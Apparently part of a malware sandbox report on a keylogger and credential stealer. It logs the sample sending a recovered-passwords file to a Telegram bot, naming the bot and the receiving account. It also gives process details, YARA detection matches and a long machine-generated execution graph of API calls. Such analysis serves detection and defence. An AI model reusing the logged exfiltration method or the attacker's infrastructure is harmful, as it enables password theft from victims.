                                                                                                                   2025-01-10 19:38:01 UTC | 584 bytes | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 35 34 35 66 33 64 31 66 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 65 6e 67 69 6e 65 65 72 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 36 36 36 35 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 34 3a 33 37 3a
                                                                                                                  Data Ascii: --------------------------8dd32545f3d1fd1Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:066656Date and Time: 10/01/2025 / 14:37:
                                                                                                                   2025-01-10 19:38:01 UTC | 388 bytes | IN | HTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 19:38:01 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 548
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                   2025-01-10 19:38:01 UTC | 548 bytes | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 33 35 38 37 34 34 32 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 69 74 69 6e 6f 32 34 31 38 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 69 74 69 6e 6f 32 34 31 38 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 31 34 36 34 33 33 31 33 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 61 75 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 41 64 61 6d 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 70 61 75 6c 61 64 61 6d 73 32 34 31 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35
                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":1234,"from":{"id":7735874420,"is_bot":true,"first_name":"Pitino2418Bot","username":"Pitino2418Bot"},"chat":{"id":2146433139,"first_name":"Paul","last_name":"Adams","username":"pauladams2419","type":"private"},"date":17365



                                                                                                                  Target ID:0
                                                                                                                  Start time:14:37:37
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\19d6P55zd1.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\19d6P55zd1.exe"
                                                                                                                  Imagebase:0x320000
                                                                                                                  File size:1'048'576 bytes
                                                                                                                  MD5 hash:13E4D4A655DB53282E89478EB1FDD462
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:14:37:40
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\19d6P55zd1.exe"
                                                                                                                  Imagebase:0xd00000
                                                                                                                  File size:45'984 bytes
                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4603067666.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:3.8%
                                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                    Signature Coverage:8.9%
                                                                                                                    Total number of Nodes:2000
                                                                                                                    Total number of Limit Nodes:55
101485 3231e0 101481->101485 101482->101358 101483 323205 IsDialogMessageW 101483->101482 101483->101485 101484 35cf32 GetClassLongW 101484->101483 101484->101485 101485->101482 101485->101483 101485->101484 101486->101358 101487->101287 101488->101292 101489->101358 101490->101297 101491->101297 101492->101297 101493->101358 101494->101358 101495->101358 101497 329851 101496->101497 101506 32984b 101496->101506 101498 35f5d3 __i64tow 101497->101498 101499 329899 101497->101499 101500 35f4da 101497->101500 101501 329857 __itow 101497->101501 102789 343698 83 API calls 3 library calls 101499->102789 101507 340db6 Mailbox 59 API calls 101500->101507 101512 35f552 Mailbox _wcscpy 101500->101512 101504 340db6 Mailbox 59 API calls 101501->101504 101505 329871 101504->101505 101505->101506 101508 327de1 59 API calls 101505->101508 101506->101358 101509 35f51f 101507->101509 101508->101506 101510 340db6 Mailbox 59 API calls 101509->101510 101511 35f545 101510->101511 101511->101512 101513 327de1 59 API calls 101511->101513 102790 343698 83 API calls 3 library calls 101512->102790 101513->101512 101514->101358 101515->101358 101517 340db6 Mailbox 59 API calls 101516->101517 101518 327688 101517->101518 101519 340db6 Mailbox 59 API calls 101518->101519 101520 327696 101519->101520 101520->101344 101521->101344 101522->101344 101524 327df0 __wsetenvp _memmove 101523->101524 101525 340db6 Mailbox 59 API calls 101524->101525 101526 327e2e 101525->101526 101526->101344 101527->101344 101528->101344 101529->101344 101530->101344 101531->101344 101532->101460 101533->101460 101543 342c44 101534->101543 101536 342d4b 101536->101444 101537->101460 101538->101460 101539->101460 101540->101460 101541->101458 101542->101460 101544 342c50 __write 101543->101544 101551 343217 101544->101551 101550 342c77 __write 101550->101536 101568 349c0b 101551->101568 101553 342c59 101554 342c88 DecodePointer DecodePointer 101553->101554 101555 342cb5 101554->101555 101556 342c65 101554->101556 
101555->101556 101614 3487a4 59 API calls __write 101555->101614 101565 342c82 101556->101565 101558 342d18 EncodePointer EncodePointer 101558->101556 101559 342cc7 101559->101558 101560 342cec 101559->101560 101615 348864 61 API calls 2 library calls 101559->101615 101560->101556 101564 342d06 EncodePointer 101560->101564 101616 348864 61 API calls 2 library calls 101560->101616 101563 342d00 101563->101556 101563->101564 101564->101558 101617 343220 101565->101617 101569 349c1c 101568->101569 101570 349c2f EnterCriticalSection 101568->101570 101575 349c93 101569->101575 101570->101553 101572 349c22 101572->101570 101599 3430b5 58 API calls 3 library calls 101572->101599 101576 349c9f __write 101575->101576 101577 349cc0 101576->101577 101578 349ca8 101576->101578 101586 349ce1 __write 101577->101586 101603 34881d 58 API calls __malloc_crt 101577->101603 101600 34a16b 58 API calls 2 library calls 101578->101600 101581 349cad 101601 34a1c8 58 API calls 8 library calls 101581->101601 101582 349cd5 101584 349cdc 101582->101584 101585 349ceb 101582->101585 101604 348b28 58 API calls __getptd_noexit 101584->101604 101589 349c0b __lock 58 API calls 101585->101589 101586->101572 101587 349cb4 101602 34309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101587->101602 101591 349cf2 101589->101591 101593 349d17 101591->101593 101594 349cff 101591->101594 101606 342d55 101593->101606 101605 349e2b InitializeCriticalSectionAndSpinCount 101594->101605 101597 349d0b 101612 349d33 LeaveCriticalSection _doexit 101597->101612 101600->101581 101601->101587 101603->101582 101604->101586 101605->101597 101607 342d5e RtlFreeHeap 101606->101607 101608 342d87 __dosmaperr 101606->101608 101607->101608 101609 342d73 101607->101609 101608->101597 101613 348b28 58 API calls __getptd_noexit 101609->101613 101611 342d79 GetLastError 101611->101608 101612->101586 101613->101611 101614->101559 101615->101560 101616->101563 101620 349d75 LeaveCriticalSection 101617->101620 
101619 342c87 101619->101550 101620->101619 101622 329837 84 API calls 101621->101622 101623 394494 101622->101623 101725 326240 101623->101725 101625 3944a4 101626 329ea0 341 API calls 101625->101626 101628 3944c9 101625->101628 101626->101628 101629 3944cd 101628->101629 101750 329a98 59 API calls Mailbox 101628->101750 101629->101474 101759 39cadd 101630->101759 101632 39df47 101632->101474 101634 324e54 101633->101634 101636 324e5b 101633->101636 101884 3453a6 101634->101884 101637 324e6a 101636->101637 101638 324e7b FreeLibrary 101636->101638 101637->101474 101638->101637 101640 327667 59 API calls 101639->101640 101641 38cbaf 101640->101641 101642 327667 59 API calls 101641->101642 101643 38cbb8 101642->101643 101644 38cbcc 101643->101644 102341 329b3c 59 API calls 101643->102341 101646 329837 84 API calls 101644->101646 101647 38cbe9 101646->101647 101648 38ccea 101647->101648 101649 38cc0b 101647->101649 101661 38cd1a Mailbox 101647->101661 102154 324ddd 101648->102154 101650 329837 84 API calls 101649->101650 101652 38cc17 101650->101652 101654 328047 59 API calls 101652->101654 101656 38cc23 101654->101656 101655 38cd16 101658 327667 59 API calls 101655->101658 101655->101661 101663 38cc69 101656->101663 101664 38cc37 101656->101664 101657 324ddd 136 API calls 101657->101655 101659 38cd4b 101658->101659 101660 327667 59 API calls 101659->101660 101662 38cd54 101660->101662 101661->101474 101666 327667 59 API calls 101662->101666 101665 329837 84 API calls 101663->101665 101667 328047 59 API calls 101664->101667 101668 38cc76 101665->101668 101669 38cd5d 101666->101669 101670 38cc47 101667->101670 101671 328047 59 API calls 101668->101671 101672 327667 59 API calls 101669->101672 101673 327cab 59 API calls 101670->101673 101674 38cc82 101671->101674 101675 38cd66 101672->101675 101676 38cc51 101673->101676 102342 384a31 GetFileAttributesW 101674->102342 101678 329837 84 API calls 101675->101678 101679 329837 84 API calls 101676->101679 101681 38cd73 
101678->101681 101682 38cc5d 101679->101682 101680 38cc8b 101683 38cc9e 101680->101683 101686 3279f2 59 API calls 101680->101686 102178 32459b 101681->102178 101685 327b2e 59 API calls 101682->101685 101688 329837 84 API calls 101683->101688 101693 38cca4 101683->101693 101685->101663 101686->101683 101687 38cd8e 102229 3279f2 101687->102229 101690 38cccb 101688->101690 102343 3837ef 75 API calls Mailbox 101690->102343 101693->101661 101694 38cdd1 101695 328047 59 API calls 101694->101695 101697 38cddf 101695->101697 101696 3279f2 59 API calls 101698 38cdae 101696->101698 101699 327b2e 59 API calls 101697->101699 101698->101694 101700 327bcc 59 API calls 101698->101700 101701 38cded 101699->101701 101702 38cdc3 101700->101702 101703 327b2e 59 API calls 101701->101703 101704 327bcc 59 API calls 101702->101704 101705 38cdfb 101703->101705 101704->101694 101706 327b2e 59 API calls 101705->101706 101707 38ce09 101706->101707 101708 329837 84 API calls 101707->101708 101709 38ce15 101708->101709 102232 384071 101709->102232 101711 38ce26 101712 383c37 3 API calls 101711->101712 101713 38ce30 101712->101713 101714 329837 84 API calls 101713->101714 101718 38ce61 101713->101718 101715 38ce4e 101714->101715 102286 389155 101715->102286 101717 324e4a 84 API calls 101717->101661 101718->101717 102785 38445a GetFileAttributesW 101719->102785 101722->101471 101723->101469 101724->101473 101726 327a16 59 API calls 101725->101726 101744 326265 101726->101744 101727 32646a 101753 32750f 59 API calls 2 library calls 101727->101753 101729 326484 Mailbox 101729->101625 101732 35dff6 101756 37f8aa 91 API calls 4 library calls 101732->101756 101733 327d8c 59 API calls 101733->101744 101734 32750f 59 API calls 101734->101744 101738 35e004 101757 32750f 59 API calls 2 library calls 101738->101757 101740 35e01a 101740->101729 101741 326799 _memmove 101758 37f8aa 91 API calls 4 library calls 101741->101758 101742 35df92 101743 328029 59 API calls 101742->101743 101745 35df9d 
101743->101745 101744->101727 101744->101732 101744->101733 101744->101734 101744->101741 101744->101742 101747 327e4f 59 API calls 101744->101747 101751 325f6c 60 API calls 101744->101751 101752 325d41 59 API calls Mailbox 101744->101752 101754 325e72 60 API calls 101744->101754 101755 327924 59 API calls 2 library calls 101744->101755 101749 340db6 Mailbox 59 API calls 101745->101749 101748 32643b CharUpperBuffW 101747->101748 101748->101744 101749->101741 101750->101629 101751->101744 101752->101744 101753->101729 101754->101744 101755->101744 101756->101738 101757->101740 101758->101729 101760 329837 84 API calls 101759->101760 101761 39cb1a 101760->101761 101781 39cb61 Mailbox 101761->101781 101797 39d7a5 101761->101797 101763 39cdb9 101764 39cf2e 101763->101764 101768 39cdc7 101763->101768 101846 39d8c8 92 API calls Mailbox 101764->101846 101767 39cf3d 101767->101768 101769 39cf49 101767->101769 101810 39c96e 101768->101810 101769->101781 101770 329837 84 API calls 101775 39cbb2 Mailbox 101770->101775 101775->101763 101775->101770 101775->101781 101829 39fbce 59 API calls 2 library calls 101775->101829 101830 39cfdf 61 API calls 2 library calls 101775->101830 101776 39ce00 101825 340c08 101776->101825 101779 39ce1a 101831 389e4a 89 API calls 4 library calls 101779->101831 101780 39ce33 101832 3292ce 101780->101832 101781->101632 101784 39ce25 GetCurrentProcess TerminateProcess 101784->101780 101789 39cfa4 101789->101781 101792 39cfb8 FreeLibrary 101789->101792 101790 39ce6b 101844 39d649 107 API calls _free 101790->101844 101792->101781 101795 329d3c 60 API calls 101796 39ce7c 101795->101796 101796->101789 101796->101795 101845 328d40 59 API calls Mailbox 101796->101845 101847 39d649 107 API calls _free 101796->101847 101798 327e4f 59 API calls 101797->101798 101799 39d7c0 CharLowerBuffW 101798->101799 101848 37f167 101799->101848 101803 327667 59 API calls 101804 39d7f9 101803->101804 101855 32784b 101804->101855 101806 39d810 101808 327d2c 59 API calls 
101806->101808 101807 39d858 Mailbox 101807->101775 101809 39d81c Mailbox 101808->101809 101809->101807 101868 39cfdf 61 API calls 2 library calls 101809->101868 101811 39c989 101810->101811 101815 39c9de 101810->101815 101812 340db6 Mailbox 59 API calls 101811->101812 101814 39c9ab 101812->101814 101813 340db6 Mailbox 59 API calls 101813->101814 101814->101813 101814->101815 101816 39da50 101815->101816 101817 39dc79 Mailbox 101816->101817 101824 39da73 _strcat _wcscpy __wsetenvp 101816->101824 101817->101776 101818 329be6 59 API calls 101818->101824 101819 329b3c 59 API calls 101819->101824 101820 329b98 59 API calls 101820->101824 101821 329837 84 API calls 101821->101824 101822 34571c 58 API calls __malloc_crt 101822->101824 101824->101817 101824->101818 101824->101819 101824->101820 101824->101821 101824->101822 101872 385887 61 API calls 2 library calls 101824->101872 101827 340c1d 101825->101827 101826 340cb5 VirtualProtect 101828 340c83 101826->101828 101827->101826 101827->101828 101828->101779 101828->101780 101829->101775 101830->101775 101831->101784 101833 3292d6 101832->101833 101834 340db6 Mailbox 59 API calls 101833->101834 101835 3292e4 101834->101835 101836 3292f0 101835->101836 101873 3291fc 101835->101873 101838 329050 101836->101838 101876 329160 101838->101876 101840 32905f 101841 340db6 Mailbox 59 API calls 101840->101841 101842 3290fb 101840->101842 101841->101842 101842->101796 101843 328d40 59 API calls Mailbox 101842->101843 101843->101790 101844->101796 101845->101796 101846->101767 101847->101796 101850 37f192 __wsetenvp 101848->101850 101849 37f1d1 101849->101803 101849->101809 101850->101849 101851 37f278 101850->101851 101854 37f1c7 101850->101854 101851->101849 101870 3278c4 61 API calls 101851->101870 101854->101849 101869 3278c4 61 API calls 101854->101869 101856 3278b7 101855->101856 101857 32785a 101855->101857 101859 327d2c 59 API calls 101856->101859 101857->101856 101858 327865 101857->101858 101860 327880 101858->101860 
101861 35eb09 101858->101861 101865 327888 _memmove 101859->101865 101871 327f27 59 API calls Mailbox 101860->101871 101862 328029 59 API calls 101861->101862 101864 35eb13 101862->101864 101866 340db6 Mailbox 59 API calls 101864->101866 101865->101806 101867 35eb33 101866->101867 101868->101807 101869->101854 101870->101851 101871->101865 101872->101824 101874 340db6 Mailbox 59 API calls 101873->101874 101875 329209 101874->101875 101875->101836 101877 329169 Mailbox 101876->101877 101878 35f19f 101877->101878 101883 329173 101877->101883 101879 340db6 Mailbox 59 API calls 101878->101879 101881 35f1ab 101879->101881 101880 32917a 101880->101840 101882 329c90 Mailbox 59 API calls 101882->101883 101883->101880 101883->101882 101885 3453b2 __write 101884->101885 101886 3453c6 101885->101886 101887 3453de 101885->101887 101919 348b28 58 API calls __getptd_noexit 101886->101919 101893 3453d6 __write 101887->101893 101897 346c11 101887->101897 101890 3453cb 101920 348db6 9 API calls __write 101890->101920 101893->101636 101898 346c21 101897->101898 101899 346c43 EnterCriticalSection 101897->101899 101898->101899 101900 346c29 101898->101900 101901 3453f0 101899->101901 101902 349c0b __lock 58 API calls 101900->101902 101903 34533a 101901->101903 101902->101901 101904 34535d 101903->101904 101905 345349 101903->101905 101906 345359 101904->101906 101922 344a3d 101904->101922 101965 348b28 58 API calls __getptd_noexit 101905->101965 101921 345415 LeaveCriticalSection LeaveCriticalSection __wfsopen 101906->101921 101909 34534e 101966 348db6 9 API calls __write 101909->101966 101915 345377 101939 350a02 101915->101939 101917 34537d 101917->101906 101918 342d55 _free 58 API calls 101917->101918 101918->101906 101919->101890 101920->101893 101921->101893 101923 344a50 101922->101923 101927 344a74 101922->101927 101924 3446e6 __fseek_nolock 58 API calls 101923->101924 101923->101927 101925 344a6d 101924->101925 101967 34d886 101925->101967 101928 350b77 101927->101928 101929 
345371 101928->101929 101930 350b84 101928->101930 101932 3446e6 101929->101932 101930->101929 101931 342d55 _free 58 API calls 101930->101931 101931->101929 101933 344705 101932->101933 101934 3446f0 101932->101934 101933->101915 102109 348b28 58 API calls __getptd_noexit 101934->102109 101936 3446f5 102110 348db6 9 API calls __write 101936->102110 101938 344700 101938->101915 101940 350a0e __write 101939->101940 101941 350a32 101940->101941 101942 350a1b 101940->101942 101943 350abd 101941->101943 101945 350a42 101941->101945 102126 348af4 58 API calls __getptd_noexit 101942->102126 102131 348af4 58 API calls __getptd_noexit 101943->102131 101948 350a60 101945->101948 101949 350a6a 101945->101949 101947 350a20 102127 348b28 58 API calls __getptd_noexit 101947->102127 102128 348af4 58 API calls __getptd_noexit 101948->102128 101953 34d206 ___lock_fhandle 59 API calls 101949->101953 101950 350a65 102132 348b28 58 API calls __getptd_noexit 101950->102132 101955 350a70 101953->101955 101957 350a83 101955->101957 101958 350a8e 101955->101958 101956 350ac9 102133 348db6 9 API calls __write 101956->102133 102111 350add 101957->102111 102129 348b28 58 API calls __getptd_noexit 101958->102129 101961 350a27 __write 101961->101917 101963 350a89 102130 350ab5 LeaveCriticalSection __unlock_fhandle 101963->102130 101965->101909 101966->101906 101968 34d892 __write 101967->101968 101969 34d8b6 101968->101969 101970 34d89f 101968->101970 101972 34d955 101969->101972 101974 34d8ca 101969->101974 102068 348af4 58 API calls __getptd_noexit 101970->102068 102074 348af4 58 API calls __getptd_noexit 101972->102074 101973 34d8a4 102069 348b28 58 API calls __getptd_noexit 101973->102069 101977 34d8f2 101974->101977 101978 34d8e8 101974->101978 101995 34d206 101977->101995 102070 348af4 58 API calls __getptd_noexit 101978->102070 101979 34d8ed 102075 348b28 58 API calls __getptd_noexit 101979->102075 101982 34d8f8 101984 34d91e 101982->101984 101985 34d90b 101982->101985 102071 348b28 58 
API calls __getptd_noexit 101984->102071 102004 34d975 101985->102004 101986 34d961 102076 348db6 9 API calls __write 101986->102076 101990 34d8ab __write 101990->101927 101991 34d917 102073 34d94d LeaveCriticalSection __unlock_fhandle 101991->102073 101992 34d923 102072 348af4 58 API calls __getptd_noexit 101992->102072 101996 34d212 __write 101995->101996 101997 34d261 EnterCriticalSection 101996->101997 101998 349c0b __lock 58 API calls 101996->101998 101999 34d287 __write 101997->101999 102000 34d237 101998->102000 101999->101982 102001 34d24f 102000->102001 102077 349e2b InitializeCriticalSectionAndSpinCount 102000->102077 102078 34d28b LeaveCriticalSection _doexit 102001->102078 102005 34d982 __ftell_nolock 102004->102005 102006 34d9e0 102005->102006 102007 34d9c1 102005->102007 102035 34d9b6 102005->102035 102010 34da38 102006->102010 102011 34da1c 102006->102011 102088 348af4 58 API calls __getptd_noexit 102007->102088 102015 34da51 102010->102015 102094 3518c1 60 API calls 3 library calls 102010->102094 102091 348af4 58 API calls __getptd_noexit 102011->102091 102012 34e1d6 102012->101991 102013 34d9c6 102089 348b28 58 API calls __getptd_noexit 102013->102089 102079 355c6b 102015->102079 102017 34da21 102092 348b28 58 API calls __getptd_noexit 102017->102092 102019 34d9cd 102090 348db6 9 API calls __write 102019->102090 102021 34da5f 102024 34ddb8 102021->102024 102095 3499ac 58 API calls 2 library calls 102021->102095 102026 34ddd6 102024->102026 102027 34e14b WriteFile 102024->102027 102025 34da28 102093 348db6 9 API calls __write 102025->102093 102030 34defa 102026->102030 102038 34ddec 102026->102038 102031 34ddab GetLastError 102027->102031 102036 34dd78 102027->102036 102042 34dfef 102030->102042 102044 34df05 102030->102044 102031->102036 102032 34da8b GetConsoleMode 102032->102024 102034 34daca 102032->102034 102033 34e184 102033->102035 102100 348b28 58 API calls __getptd_noexit 102033->102100 102034->102024 102037 34dada GetConsoleCP 
102034->102037 102102 34c5f6 102035->102102 102036->102033 102036->102035 102041 34ded8 102036->102041 102037->102033 102064 34db09 102037->102064 102038->102033 102039 34de5b WriteFile 102038->102039 102039->102031 102043 34de98 102039->102043 102047 34dee3 102041->102047 102048 34e17b 102041->102048 102042->102033 102049 34e064 WideCharToMultiByte 102042->102049 102043->102038 102050 34debc 102043->102050 102044->102033 102051 34df6a WriteFile 102044->102051 102045 34e1b2 102101 348af4 58 API calls __getptd_noexit 102045->102101 102097 348b28 58 API calls __getptd_noexit 102047->102097 102099 348b07 58 API calls 2 library calls 102048->102099 102049->102031 102060 34e0ab 102049->102060 102050->102036 102051->102031 102052 34dfb9 102051->102052 102052->102036 102052->102044 102052->102050 102055 34dee8 102098 348af4 58 API calls __getptd_noexit 102055->102098 102056 34e0b3 WriteFile 102059 34e106 GetLastError 102056->102059 102056->102060 102059->102060 102060->102036 102060->102042 102060->102050 102060->102056 102061 3562ba 60 API calls __write_nolock 102061->102064 102062 34dbf2 WideCharToMultiByte 102062->102036 102063 34dc2d WriteFile 102062->102063 102063->102031 102066 34dc5f 102063->102066 102064->102036 102064->102061 102064->102062 102064->102066 102096 3435f5 58 API calls __isleadbyte_l 102064->102096 102065 357a5e WriteConsoleW CreateFileW __putwch_nolock 102065->102066 102066->102031 102066->102036 102066->102064 102066->102065 102067 34dc87 WriteFile 102066->102067 102067->102031 102067->102066 102068->101973 102069->101990 102070->101979 102071->101992 102072->101991 102073->101990 102074->101979 102075->101986 102076->101990 102077->102001 102078->101997 102080 355c76 102079->102080 102081 355c83 102079->102081 102082 348b28 __write 58 API calls 102080->102082 102084 355c8f 102081->102084 102085 348b28 __write 58 API calls 102081->102085 102083 355c7b 102082->102083 102083->102021 102084->102021 102086 355cb0 102085->102086 102087 348db6 __write 9 
API calls 102086->102087 102087->102083 102088->102013 102089->102019 102090->102035 102091->102017 102092->102025 102093->102035 102094->102015 102095->102032 102096->102064 102097->102055 102098->102035 102099->102035 102100->102045 102101->102035 102103 34c600 IsProcessorFeaturePresent 102102->102103 102104 34c5fe 102102->102104 102106 35590a 102103->102106 102104->102012 102107 3558b9 ___raise_securityfailure 5 API calls 102106->102107 102108 3559ed 102107->102108 102108->102012 102109->101936 102110->101938 102134 34d4c3 102111->102134 102113 350aeb 102114 350b41 102113->102114 102118 34d4c3 __commit 58 API calls 102113->102118 102125 350b1f 102113->102125 102147 34d43d 59 API calls __write 102114->102147 102116 34d4c3 __commit 58 API calls 102120 350b2b CloseHandle 102116->102120 102117 350b49 102121 350b6b 102117->102121 102148 348b07 58 API calls 2 library calls 102117->102148 102119 350b16 102118->102119 102122 34d4c3 __commit 58 API calls 102119->102122 102120->102114 102123 350b37 GetLastError 102120->102123 102121->101963 102122->102125 102123->102114 102125->102114 102125->102116 102126->101947 102127->101961 102128->101950 102129->101963 102130->101961 102131->101950 102132->101956 102133->101961 102135 34d4e3 102134->102135 102136 34d4ce 102134->102136 102140 34d508 102135->102140 102151 348af4 58 API calls __getptd_noexit 102135->102151 102149 348af4 58 API calls __getptd_noexit 102136->102149 102139 34d4d3 102150 348b28 58 API calls __getptd_noexit 102139->102150 102140->102113 102141 34d512 102152 348b28 58 API calls __getptd_noexit 102141->102152 102144 34d4db 102144->102113 102145 34d51a 102153 348db6 9 API calls __write 102145->102153 102147->102117 102148->102121 102149->102139 102150->102144 102151->102141 102152->102145 102153->102144 102344 324bb5 102154->102344 102159 35d8e6 102161 324e4a 84 API calls 102159->102161 102160 324e08 LoadLibraryExW 102354 324b6a 102160->102354 102163 35d8ed 102161->102163 102165 324b6a 3 API calls 
102163->102165 102167 35d8f5 102165->102167 102380 324f0b 102167->102380 102168 324e2f 102168->102167 102169 324e3b 102168->102169 102170 324e4a 84 API calls 102169->102170 102172 324e40 102170->102172 102172->101655 102172->101657 102175 35d91c 102388 324ec7 102175->102388 102179 327667 59 API calls 102178->102179 102180 3245b1 102179->102180 102181 327667 59 API calls 102180->102181 102182 3245b9 102181->102182 102183 327667 59 API calls 102182->102183 102184 3245c1 102183->102184 102185 327667 59 API calls 102184->102185 102186 3245c9 102185->102186 102187 35d4d2 102186->102187 102188 3245fd 102186->102188 102189 328047 59 API calls 102187->102189 102190 32784b 59 API calls 102188->102190 102191 35d4db 102189->102191 102192 32460b 102190->102192 102662 327d8c 102191->102662 102194 327d2c 59 API calls 102192->102194 102195 324615 102194->102195 102196 324640 102195->102196 102197 32784b 59 API calls 102195->102197 102198 324680 102196->102198 102200 32465f 102196->102200 102211 35d4fb 102196->102211 102201 324636 102197->102201 102199 32784b 59 API calls 102198->102199 102202 324691 102199->102202 102205 3279f2 59 API calls 102200->102205 102204 327d2c 59 API calls 102201->102204 102206 3246a3 102202->102206 102209 328047 59 API calls 102202->102209 102203 35d5cb 102207 327bcc 59 API calls 102203->102207 102204->102196 102208 324669 102205->102208 102210 3246b3 102206->102210 102212 328047 59 API calls 102206->102212 102218 35d588 102207->102218 102208->102198 102215 32784b 59 API calls 102208->102215 102209->102206 102214 3246ba 102210->102214 102216 328047 59 API calls 102210->102216 102211->102203 102213 35d5b4 102211->102213 102220 35d532 102211->102220 102212->102210 102213->102203 102221 35d59f 102213->102221 102217 328047 59 API 